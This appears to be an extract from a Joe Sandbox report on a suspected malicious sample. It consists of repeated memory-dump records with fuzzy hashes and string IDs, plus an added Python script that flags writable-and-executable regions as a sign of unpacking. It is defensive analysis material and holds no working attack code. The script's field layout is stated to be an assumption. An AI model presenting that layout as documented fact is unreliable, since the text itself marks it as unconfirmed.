• Source File: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_file.jbxd
Similarity
• API ID:
• String ID: ?X/[$DAE:$p6S$Fc%
• API String ID: 0-1456236989
• Opcode ID: 022eaf7b2bccb13d7fab4e7c4086fbf18fbaf1f70fe5f6bb5c43dac213b895f3
• Instruction ID: 5cd47767517dd2949925d7b9e4621b363582c3868b38edd641f9dc70d506a73a
• Opcode Fuzzy Hash: 022eaf7b2bccb13d7fab4e7c4086fbf18fbaf1f70fe5f6bb5c43dac213b895f3
• Instruction Fuzzy Hash: E2B228F3A082049FE3046E2DEC8567ABBE9EF94620F1A453DEAC5C3744E63598058796
Strings
Memory Dump Source
• Source File: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_file.jbxd
Similarity
• API ID:
• String ID: EO~u$H-K$_c}$c7
• API String ID: 0-1499570543
• Opcode ID: 5a8b83870d1d45f0e0061c17f7c9e278036f89cae1961512d16632f73cbbf8bd
• Instruction ID: 222e979f143d324c3c65d4face3d1f11329c070ad574ed2f5eaf128a0229c61a
• Opcode Fuzzy Hash: 5a8b83870d1d45f0e0061c17f7c9e278036f89cae1961512d16632f73cbbf8bd
• Instruction Fuzzy Hash: 90B2D5F3A0C2049FE304AE2DEC8567AF7E9EF94620F16493DEAC4C7744E63558058697
Strings
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_file.jbxd
Similarity
• API ID:
• String ID: 'O"A$P?l1$X[$o7cI$w3k5
• API String ID: 0-455523353
• Opcode ID: b6ce6a925084d3a51c8481ec5da541918f73f81787d18276be229396cc298032
• Instruction ID: 69eea16167fc618ddf41c3caaf4301a446c604a77b07a7beef83c6302111682b
• Opcode Fuzzy Hash: b6ce6a925084d3a51c8481ec5da541918f73f81787d18276be229396cc298032
• Instruction Fuzzy Hash: 0A31487120C3859BE7348F58EC41FEBB7E8FBC5308F14492DF659CA281E67591068B56
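Every function record above carries the same set of memory-dump identifiers, and the hex fields inside those names are what tell an analyst which regions of the loaded image were writable and executable at dump time. The following is an added example, not code from Joe Sandbox or from this report, that decodes those identifiers and lists the regions mapped with execute+write protection. The PAGE_* and MEM_* values are the standard Windows constants from winnt.h; the assignment of the dot-separated fields (process index, stage, dump id, base address, protection, flag, region type, index) is an assumption made for this example and is not documented on the page. The sample record is the Memory Dump Source list from the report, embedded inline so the script runs offline.

```python
"""Decode Joe Sandbox memory-dump identifiers (added example, not Joe Sandbox code)."""
import re
from dataclasses import dataclass
from typing import List

# Page-protection and region-type constants from winnt.h (standard values).
PAGE_NOACCESS, PAGE_READONLY, PAGE_READWRITE, PAGE_WRITECOPY = 0x01, 0x02, 0x04, 0x08
PAGE_EXECUTE, PAGE_EXECUTE_READ = 0x10, 0x20
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80
PAGE_GUARD = 0x100
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000

PROTECT_NAMES = {
    PAGE_NOACCESS: "PAGE_NOACCESS", PAGE_READONLY: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE", PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE: "PAGE_EXECUTE", PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITE_MASK = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# ASSUMED field layout: <proc>.<stage>.<dump>.<base>.<protect>.<flag>.<rtype>.<index>.sdmp
DUMP_RE = re.compile(
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<flag>[0-9A-Fa-f]{8})\."
    r"(?P<rtype>[0-9A-Fa-f]{8})\.(?P<index>[0-9A-Fa-f]{8})\.sdmp"
)


@dataclass(frozen=True)
class Region:
    name: str
    proc: int
    stage: int
    dump_id: int
    base: int
    protect: int
    rtype: int

    @property
    def protect_name(self) -> str:
        # Strip modifier bits (e.g. PAGE_GUARD) before looking up the base protection.
        return PROTECT_NAMES.get(self.protect & 0xFF, hex(self.protect))

    @property
    def is_executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)

    @property
    def is_writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)

    @property
    def is_image(self) -> bool:
        return bool(self.rtype & MEM_IMAGE)


def parse_dump_name(name: str) -> Region:
    """Decode one *.sdmp identifier; raises ValueError on an unexpected shape."""
    m = DUMP_RE.search(name)
    if not m:
        raise ValueError(f"not a dump identifier: {name!r}")
    return Region(
        name=m.group(0),
        proc=int(m["proc"], 16), stage=int(m["stage"], 16), dump_id=int(m["dump"]),
        base=int(m["base"], 16), protect=int(m["protect"], 16), rtype=int(m["rtype"], 16),
    )


def regions_from_report(text: str) -> List[Region]:
    """Collect every distinct dump identifier in a report fragment, in order of appearance."""
    seen, out = set(), []
    for m in DUMP_RE.finditer(text):
        if m.group(0) not in seen:
            seen.add(m.group(0))
            out.append(parse_dump_name(m.group(0)))
    return out


def writable_executable(regions: List[Region]) -> List[Region]:
    """Regions mapped with both write and execute rights: the usual sign of in-place unpacking."""
    return [r for r in regions if r.is_executable and r.is_writable]


# Memory Dump Source list copied from one function record of this report.
SAMPLE_RECORD = """
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
"""

if __name__ == "__main__":
    for r in writable_executable(regions_from_report(SAMPLE_RECORD)):
        print(f"{r.base:#010x} {r.protect_name:<24} image={r.is_image}")
```

With the field layout assumed above, the record decodes to thirteen regions of one image-backed module based at 0x330000; only the header page at 0x330000 and the page at 0x386000 are plain read/write, and the eleven others carry PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY. PAGE_EXECUTE_WRITECOPY is counted as writable because the copy-on-write mapping still lets the process modify and then run those pages.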
Strings
Memory Dump Source
• Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
• Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8$OMIO$cmj.$x
                                                                              • API String ID: 0-4161743809
                                                                              • Opcode ID: df6f11e26957ede61ae9d584a5c7ad413bf62493011c90b4395774672c3b0b2b
                                                                              • Instruction ID: e3765582309446df4663ff3f613f0c83629e480062e3092f693c5ad8a40866c5
                                                                              • Opcode Fuzzy Hash: df6f11e26957ede61ae9d584a5c7ad413bf62493011c90b4395774672c3b0b2b
                                                                              • Instruction Fuzzy Hash: 09C1E47264C3C18BD3228F2994A035BBFE1AFD7340F094A6DE4D54B392D77A8905CB96
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: %]k$SO{m$a9k
                                                                              • API String ID: 0-4264105539
                                                                              • Opcode ID: 26df7a065763c5e3dee91aa98fc043f42d4a21ca0f16bf7eaf30699335af5b4a
                                                                              • Instruction ID: 2bbcb2b056eec46e0224e85301221883867e3ad5915f462d74ad21bb103c9d39
                                                                              • Opcode Fuzzy Hash: 26df7a065763c5e3dee91aa98fc043f42d4a21ca0f16bf7eaf30699335af5b4a
                                                                              • Instruction Fuzzy Hash: 00B2F4F360C2049FE304AE2DDC8567AFBE9EF94720F1A493DEAC4C7744EA7558018696
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000003.1446145123.00000000056C1000.00000004.00000800.00020000.00000000.sdmp, Offset: 056C1000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_3_56c1000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: a$a$ror
                                                                              • API String ID: 0-2894684893
                                                                              • Opcode ID: 3f39549349244eb9fb2dc98c78bd5572f21d8c38bc5417e1d6e63f6cd3399fc6
                                                                              • Instruction ID: ac36058b4c03c17510dfa96764fef819eabbfd7b081a469797a8bfac59fc5e3e
                                                                              • Opcode Fuzzy Hash: 3f39549349244eb9fb2dc98c78bd5572f21d8c38bc5417e1d6e63f6cd3399fc6
                                                                              • Instruction Fuzzy Hash: 91029C6655D3C05FD7538B7488A57A13FB0EF13228F1E89DBC4C18F1A3D26A594AC722
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: )$)$IEND
                                                                              • API String ID: 0-588110143
                                                                              • Opcode ID: 7ebcf696dff9d5faab362ccad4c41f54003e3fe387939189de8bba7254fc2a93
                                                                              • Instruction ID: 755d93df32b20c54df10ccf39cbb15943052867a1ddffce0eb44ca4bf4aa73aa
                                                                              • Opcode Fuzzy Hash: 7ebcf696dff9d5faab362ccad4c41f54003e3fe387939189de8bba7254fc2a93
                                                                              • Instruction Fuzzy Hash: B5F100B1A08701ABE315CF28D89172BBBE4BB85304F14462DF99A9B391D775F814CB82
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: G*$BQ5$Sc
                                                                              • API String ID: 0-3704218044
                                                                              • Opcode ID: 594f857bc6bd7dfeed06389b69f5a74b9210acde42a34cbd38d254fa1153cb0a
                                                                              • Instruction ID: d9fd104a6d4b51eacdde7c282c3c5fbb14a6ad2e6ab6c82b39011d80d5346f63
                                                                              • Opcode Fuzzy Hash: 594f857bc6bd7dfeed06389b69f5a74b9210acde42a34cbd38d254fa1153cb0a
                                                                              • Instruction Fuzzy Hash: 7D51D27660C3409BE324CF24D886B5FBAE5EBC5714F14C92CF5898B291DB75940A8B93
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 2$n
                                                                              • API String ID: 0-2202813717
                                                                              • Opcode ID: 8d0f1b4f542bc2a1daceeeff30080f2f83204c935534a3797c8568c27c45a7a8
                                                                              • Instruction ID: 704c3d7fd310afcb707d2a530b2866e2d7a6d7c8c3b904b07be04c5a21d3cef4
                                                                              • Opcode Fuzzy Hash: 8d0f1b4f542bc2a1daceeeff30080f2f83204c935534a3797c8568c27c45a7a8
                                                                              • Instruction Fuzzy Hash: 7091026261D7D04AC312827C9C8435EAED25BEB224F2DCF6DE4E1877DAD5A4C806C363
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: 5|iL$KJML
                                                                              • API String ID: 2994545307-536917200
                                                                              • Opcode ID: ff9c47d7de7c23fd5f34e25e0529ff0934f1d394420ea32e3c13055dad6e8f4d
                                                                              • Instruction ID: 632b1e9d168af94785f511d017073392f61c4ee11751b9ce1209cbd7d9059984
                                                                              • Opcode Fuzzy Hash: ff9c47d7de7c23fd5f34e25e0529ff0934f1d394420ea32e3c13055dad6e8f4d
                                                                              • Instruction Fuzzy Hash: E6612932A243109BD7229F68D88477BB7E6EBC5714F1AE429DCC8A731AD635DC0187D1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_330000_file.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: P?l1
                                                                              • API String ID: 2994545307-1575507586
                                                                              • Opcode ID: 3e61cd0351c17e6621909c980c3b7d9b5bc84aa8d9749076051bdce3d5909035
                                                                              • Instruction ID: 9089df70ec1966866bcfd17b29f2b45f301d09280ec310ced4e341cad1163f6d
                                                                              • Opcode Fuzzy Hash: 3e61cd0351c17e6621909c980c3b7d9b5bc84aa8d9749076051bdce3d5909035
                                                                              • Instruction Fuzzy Hash: 8A91B5366143119FC72ADF1CC490A2AB7E2FF98750F16892CE9898B365DB35DC51CB82
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1546007437.0000000000331000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                              • Associated: 00000000.00000002.1545987045.0000000000330000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1546007437.0000000000375000.00000040.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1546053683.0000000000386000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000612000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000619000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546067102.0000000000628000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546293117.0000000000629000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546395438.00000000007C1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1546411625.00000000007C2000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_330000_file.jbxd
Similarity
• API ID:
• String ID: ,
• API String ID: 0-3772416878
• Opcode ID: 8fa0784d4a3c4da7f7da94379acf70cb67b349246050947ca5ec2c8812b10dba
• Instruction ID: 552fd484e93fe7ce8808ed1e9c93104fbdad6f76184a56b52808a40b6c3eda90
• Opcode Fuzzy Hash: 8fa0784d4a3c4da7f7da94379acf70cb67b349246050947ca5ec2c8812b10dba
• Instruction Fuzzy Hash: F1B139712083819FD325CF58C88161BFBE0AFA9704F448E2DF5D99B742D671EA18CB56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1546067102.0000000000388000.00000040.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
